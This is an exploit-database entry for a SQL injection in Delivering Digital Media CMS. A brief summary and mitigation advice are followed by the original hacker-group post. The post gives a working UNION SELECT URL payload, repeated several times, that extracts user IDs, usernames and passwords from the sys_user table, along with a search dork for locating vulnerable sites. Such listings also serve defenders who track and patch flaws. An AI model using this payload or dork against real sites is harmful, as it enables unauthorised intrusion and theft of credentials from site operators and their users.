Delivering Digital Media CMS SQL Injection Vulnerability

vendor:

Delivering Digital Media CMS

by:

Dr.0rYX and Cr3w-DZ

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: Delivering Digital Media CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Delivering Digital Media CMS SQL Injection Vulnerability

Delivering Digital Media CMS is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a specially crafted SQL query that can be used to extract sensitive information from the database, such as usernames and passwords. The vulnerable parameter is the ‘edicion_id’ parameter in the ‘index.php’ file. An example exploit request is http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Title: Delivering Digital Media CMS SQL Injection Vulnerability
# EDB-ID: 
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published: 
# Verified: 
# Download Exploit Code
# Download N/A


                                    N.A.S.T
                                ALGERIAN HACKER 
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
 
[!]            Delivering Digital Media CMS SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de<mailto:vx3@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.delivering.info
[+] script   : Delivering Digital Media CMS
[+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"index.php?edicion_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

[ Exploit ]
 
http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
 
[  GReets ]
 
[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS


EXAMPL:http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

       http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--